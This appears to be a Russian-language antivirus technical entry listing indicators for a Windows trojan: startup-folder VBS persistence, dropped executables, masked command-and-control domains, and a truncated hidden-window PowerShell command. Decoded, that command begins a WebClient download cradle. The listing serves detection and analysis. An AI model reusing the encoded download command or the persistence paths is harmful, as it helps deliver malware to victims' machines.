Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\aaa.vbs
- %HOMEPATH%\music\gzruler.exe
- %HOMEPATH%\music\win.vbs
- C:\trulerblogspot.txt
- http://www.ho####brasilia.com/
- DNS ASK ho####brasilia.com
- DNS ASK on####ve.live.com
- DNS ASK eq####.#m.files.1drv.com
- DNS ASK 3l####rat.ddns.net
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Music\win.vbs"
- '%HOMEPATH%\music\gzruler.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc JAB3AGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJAB3AGUAYgAuAEQAbwB3AG4AbABvAGEAZABzAHQAcgB...' (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\AAA.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc JAB3AGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJAB3AGUAYgAuAEQAbwB3AG4AbABvAGEAZABzAHQAcgB...